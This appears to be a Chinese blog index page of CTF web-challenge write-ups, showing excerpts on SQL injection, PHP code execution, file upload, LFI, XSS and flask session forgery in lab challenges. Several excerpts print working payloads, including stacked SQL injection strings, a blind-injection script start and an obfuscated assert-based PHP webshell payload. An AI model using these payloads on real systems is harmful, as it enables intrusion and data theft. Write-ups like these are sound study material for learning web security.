CTF
文章平均质量分 74
各类ctf总结
WuT0ng
这个作者很懒,什么都没留下…
展开
-
[强网杯 2019]随便注+CISCN2019 Hack World
这道题考察的是堆叠注入,order by判断出有两个字段这里也过滤了一些关键词看到有两个表,flag字段在那个纯数字的表里,但是无法查询得到words有两列,id和data(一会第一种方法要用到)1';show columns from `1919810931114514`;#这里的反引号用来表示表名,这里必须加上,但是words表不用加,这里猜测和表的数据类型有关,纯数字型的要加...原创 2020-02-24 14:33:28 · 295 阅读 · 0 评论 -
[GYCTF2020]Ezsqli(无列名注入)
[GYCTF2020]Ezsqli过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键接下来就可以写脚本判断表名了import requestsurl = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/'payload = '2||ascii(substr((select group_concat原创 2020-05-16 21:22:40 · 5015 阅读 · 2 评论 -
[极客大挑战 2019]RCE ME
代码执行,过滤了字母数字,用异或或取反都可以code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo发现过滤了大部分命令执行的函数,下面考虑如何绕过,有两种方法①蚁剑插件首先构造一个木马code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=e...原创 2020-04-02 22:12:29 · 1203 阅读 · 1 评论 -
[网鼎杯 2018]Comment
首先爆破弱密码登录,是一个类似留言板的界面,考虑二次注入git源码泄露这里要恢复一下文件,否则文件内容显示不全//write_do.php<?phpinclude "mysql.php";session_start();if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(...原创 2020-03-26 20:50:15 · 4353 阅读 · 0 评论 -
[网鼎杯 2018]Fakebook
robots.txt泄露源码//user.php.bak<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->...原创 2020-03-25 00:12:13 · 4859 阅读 · 0 评论 -
[De1CTF 2019]SSRF Me
#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding(...原创 2020-03-19 20:23:02 · 486 阅读 · 0 评论 -
[CISCN2019 华东北赛区]Web2
注册登录后,观察这两个页面联想到存储型xss盗取cookie,下面我们要做的就是触发xss代码经过测试这里要用HTML Markup转码in_str = "eval(alert(/xss/))"list = ""for tr in in_str: list += "&#" + str(ord(tr))print(list)<svg><scri...原创 2020-03-18 22:19:07 · 398 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
查看源码可能有用伪协议读取源码利用此方法依次读取到delete.php,confirm.php,change.php,search.php,不一一展示了,直接看存在漏洞的confirm.php和change.php//confirm.php<?phprequire_once "config.php";//var_dump($_POST);if(!empty($_POST...原创 2020-03-18 00:51:34 · 1007 阅读 · 0 评论 -
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
文件泄露通过观察源代码(反正就是这几个php文件嘛,一个个试就行了)//image.php.bak<?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);$path=a...原创 2020-03-17 01:12:27 · 1328 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day1 Web2]ikun 1
写一个python脚本import requestsurl = 'http://c8f78f51-2593-4b2a-8e72-f39543bc99dd.node3.buuoj.cn/shop?page={}'for i in range(1000): r = requests.get(url.format(str(i))) if 'lv6.png' in r.text:...原创 2020-03-16 21:52:53 · 559 阅读 · 1 评论 -
“百度杯”CTF比赛 十二月场 Blog·进阶篇
利用上一篇blog的思路,用admin/19-10-1997得到管理页面这里用php伪协议读取是不行的,php://filter已经失效了,这里的文件包含仍然能够执行,这里是我们可以利用的这里的思路是上传一个shell,用命令执行读取shell,上传点也不好找,这里利用的是一个php文件上传的特性这里利用了php对POST上传文件临时保存的特性php对post过来的文件有一个默认处理流程...原创 2020-03-02 11:55:21 · 910 阅读 · 0 评论 -
“百度杯”CTF比赛 十二月场 Blog
进去注册登录,找到post界面类似一个编辑器的东西,上传一个图片报错并且提示这是kindeditor编辑器关于kindeditor编辑器的一个遍历漏洞,涉及代码审计,暂且不考虑原理https://www.jb51.net/hack/367946.html发现了flag.php,访问并没有可用信息这道题其实是一个insert注入,就在留言板界面那里这是一个类似insert i...原创 2020-03-01 00:29:03 · 775 阅读 · 1 评论 -
web
i春秋(VID)首先查看源码,提示访问index.php.txt,得到一些代码,这里简单整理一下Finding entry pointsBranch analysis from position: 0Jump found. Position 1 = 23, Position 2 = 38Branch analysis from position: 23Jump found. Posit...原创 2019-10-14 17:01:32 · 205 阅读 · 0 评论 -
[BUUCTF 2018]Online Tool
代码审计HTTP_X_FORWARDED_FOR获得客户端的ip地址对于escapeshellarg这是在本地的一个运行结果escapeshellcmd — shell 元字符转义功能:escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之...原创 2019-11-04 23:55:06 · 150 阅读 · 0 评论 -
[HCTF 2018]admin
这道题先用flask session伪造来做flask session伪造过程就是先创建一个普通用户(知道session),解密,把name换成admin(前提也是admin作为管理员账户),在加密,通过admin的session登陆进去,就能直接实现对admin的控制首先创建一个test用户,如图为它的session将session解密#!/usr/bin/env python3im...原创 2019-12-09 15:39:08 · 777 阅读 · 0 评论 -
[SUCTF 2019]EasyWeb
<?phpfunction get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($u...原创 2020-01-01 19:14:33 · 638 阅读 · 0 评论 -
[SUCTF 2019]CheckIn
一看是文件上传,限制了后缀,不能上传.htaccess,检查了文件内容,不过我们可以添加GIF89a来伪造一个文件头这里利用到了.user.ini编辑.use.ini的内容,pc_ma.jpg是事先准备好的一句话木马发现过滤了<?,这里我们进行变形发现还是不行,然后尝试了一个普通的jpg文件,发现也是不行,猜测这里可能是进行了文件头的检测,加一个GIF89a(.user.in...原创 2020-01-05 16:31:12 · 1645 阅读 · 0 评论 -
[SWPU2019]Web1
这是一个留言板的二次注入当时自己用的是报错注入,结果并没有做出来,看其他人的wp用的是union注入,并且有22个字段原创 2020-01-15 23:25:42 · 2950 阅读 · 0 评论 -
[RoarCTF 2019]Simple Upload
<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller{ public function index() { show_source(__FILE__); } public function uploa...原创 2020-01-19 23:49:18 · 2860 阅读 · 0 评论 -
[CISCN 2019 初赛]Love Math
<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { ...原创 2020-02-19 17:44:33 · 2045 阅读 · 0 评论